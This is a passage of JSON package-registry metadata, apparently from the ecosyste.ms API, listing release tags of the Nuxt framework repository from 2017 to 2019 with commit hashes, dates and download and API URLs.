0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms